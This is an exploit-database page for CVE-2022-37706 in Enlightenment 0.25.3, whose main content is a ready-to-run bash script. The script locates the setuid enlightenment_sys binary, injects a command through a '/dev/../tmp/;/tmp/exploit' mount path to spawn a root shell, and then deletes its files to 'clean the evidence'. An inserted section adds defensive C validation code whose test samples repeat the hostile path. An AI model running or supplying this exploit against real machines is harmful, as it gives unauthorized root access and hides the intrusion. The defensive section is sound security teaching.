Enlightenment v0.25.3 – Privilege escalation

  • Author: nu11secur1ty
    Date: 2023-04-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51180/
  • ## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
    ## Author: nu11secur1ty
    ## Date: 12.26.2022
    ## Vendor: https://www.enlightenment.org/
    ## Software: https://www.enlightenment.org/download
    ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
    ## CVE ID: CVE-2022-37706
    ## Description:
    Enlightenment version 0.25.3 is vulnerable to local privilege escalation.
    enlightenment_sys in Enlightenment before 0.25.3 allows local users to
    gain privileges because it is setuid root and the system() library
    function mishandles pathnames that begin with a /dev/.. substring.
    An attacker with local access to a machine on which Enlightenment is
    installed can use this vulnerability to do very dangerous things.
    
    ## STATUS: CRITICAL Vulnerability
    
    ## Tested on:
    ```bash
    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=22.10
    DISTRIB_CODENAME=kinetic
    DISTRIB_DESCRIPTION="Ubuntu 22.10"
    PRETTY_NAME="Ubuntu 22.10"
    NAME="Ubuntu"
    VERSION_ID="22.10"
    VERSION="22.10 (Kinetic Kudu)"
    VERSION_CODENAME=kinetic
    ID=ubuntu
    ID_LIKE=debian
    HOME_URL="https://www.ubuntu.com/"
    SUPPORT_URL="https://help.ubuntu.com/"
    BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
    PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
    UBUNTU_CODENAME=kinetic
    LOGO=ubuntu-logo
    ```
    
    [+] Exploit:
    
    ```bash
    #!/usr/bin/bash
    # Idea by MaherAzzouz
    # Development by nu11secur1ty
    
    echo "CVE-2022-37706"
    echo "[*] Trying to find the vulnerable SUID file..."
    echo "[*] This may take few seconds..."
    
    # The actual problem
    file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
    if [[ -z ${file} ]]
    then
    	echo "[-] Couldn't find the vulnerable SUID file..."
    	echo "[*] Enlightenment should be installed on your system."
    	exit 1
    fi
    
    echo "[+] Vulnerable SUID binary found!"
    echo "[+] Trying to pop a root shell!"
    mkdir -p /tmp/net
    mkdir -p "/dev/../tmp/;/tmp/exploit"
    
    echo "/bin/sh" > /tmp/exploit
    chmod a+x /tmp/exploit
    echo "[+] Welcome to the rabbit hole :)"
    
    ${file} /bin/mount -o \
        noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \
        "/dev/../tmp/;/tmp/exploit" /tmp///net
    
    read -p "Press any key to clean the evidence..."
    echo -e "Please wait... "
    
    sleep 5
    rm -rf /tmp/exploit
    rm -rf /tmp/net
    echo -e "Done; Everything is clear ;)"
    
    ```
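    
    The description above boils down to one input-validation failure: a setuid helper accepts a caller-supplied device path, checks only that it starts with `/dev/`, and then hands it to the shell via the system() library function, so `/dev/../tmp/;...` both escapes the prefix and smuggles in a command separator. The following C program is an added example written for this page (it is not code from the Enlightenment project or from the advisory); the function names `path_is_lexically_safe`, `canonical_path_under_dev`, `validate_mount_source` and `build_mount_argv` are hypothetical, and the sample paths are constructed. It shows the two checks a helper like this needs (a lexical check that rejects `..` components and shell metacharacters, and a realpath(3) check that the canonical path still lives under `/dev/`) and why passing an argv to execv(2) is preferable to building a command string for system(3).
    
    ```c
    // Added example (not code from the Enlightenment project or from this
    // advisory): input validation for a setuid helper that hands a user-supplied
    // device path to mount. Function names are hypothetical.
    #include <limits.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    #ifndef PATH_MAX
    #define PATH_MAX 4096
    #endif
    
    /* Characters allowed in a device path. ';', ' ', '$', '`', quotes and
     * newlines are not on the list, so the path can never be parsed as shell
     * syntax even if it did reach system(3). */
    static int safe_char(unsigned char c) {
        if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9'))
            return 1;
        return c == '/' || c == '-' || c == '_' || c == '.';
    }
    
    /* Lexical check: must start with "/dev/", contain only safe characters and
     * contain no "." or ".." components. A bare prefix check is what the
     * advisory's "/dev/../tmp/;..." path gets past; this check rejects it. */
    int path_is_lexically_safe(const char *p) {
        if (p == NULL || strncmp(p, "/dev/", 5) != 0)
            return 0;
        for (const unsigned char *c = (const unsigned char *)p; *c; c++)
            if (!safe_char(*c))
                return 0;
        const char *s = p;
        while (*s) {
            while (*s == '/') s++;                 /* skip separator run   */
            const char *e = s;
            while (*e && *e != '/') e++;           /* find component end   */
            size_t n = (size_t)(e - s);
            if (n == 0) break;
            if ((n == 1 && s[0] == '.') || (n == 2 && s[0] == '.' && s[1] == '.'))
                return 0;
            s = e;
        }
        return 1;
    }
    
    /* Filesystem check: resolve symlinks and ".." with realpath(3) and require
     * the canonical path to still live under /dev/. This catches a symlink in
     * /dev that points outside it, which no lexical check can see. */
    int canonical_path_under_dev(const char *p) {
        char resolved[PATH_MAX];
        if (realpath(p, resolved) == NULL)
            return 0;
        return strncmp(resolved, "/dev/", 5) == 0;
    }
    
    int validate_mount_source(const char *p) {
        return path_is_lexically_safe(p) && canonical_path_under_dev(p);
    }
    
    /* Build an argv for execv(2) instead of a command line for system(3):
     * every argument is delivered verbatim, so ';' in a path is a filename
     * character, not a command separator. Returns 0 and leaves argv untouched
     * when the source path fails validation. */
    int build_mount_argv(const char *src, const char *opts, const char *target,
                         const char *argv[6]) {
        if (!validate_mount_source(src))
            return 0;
        argv[0] = "/bin/mount";
        argv[1] = "-o";
        argv[2] = opts;
        argv[3] = src;
        argv[4] = target;
        argv[5] = NULL;
        return 1;
    }
    
    int main(void) {
        /* Constructed sample inputs: the advisory's path plus benign ones. */
        const char *samples[] = {
            "/dev/../tmp/;/tmp/exploit", "/dev/./sda1", "/dev/sda1", "/dev/null",
        };
        for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
            printf("%-28s lexical=%d full=%d\n", samples[i],
                   path_is_lexically_safe(samples[i]),
                   validate_mount_source(samples[i]));
        return 0;
    }
    ```
    
    The lexical check runs first so that hostile input never reaches the filesystem lookup; the realpath check exists because a path that is lexically clean can still resolve outside `/dev` through a symlink. Neither check replaces dropping privileges or restricting which callers may reach the helper, but together with execv they remove the two properties the advisory relies on: prefix-only validation and shell interpretation of the path.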
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
    ## Proof and Exploit:
    [href](https://streamable.com/zflbgg)
    
    ## Time spent
    `01:00:00`
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html and https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>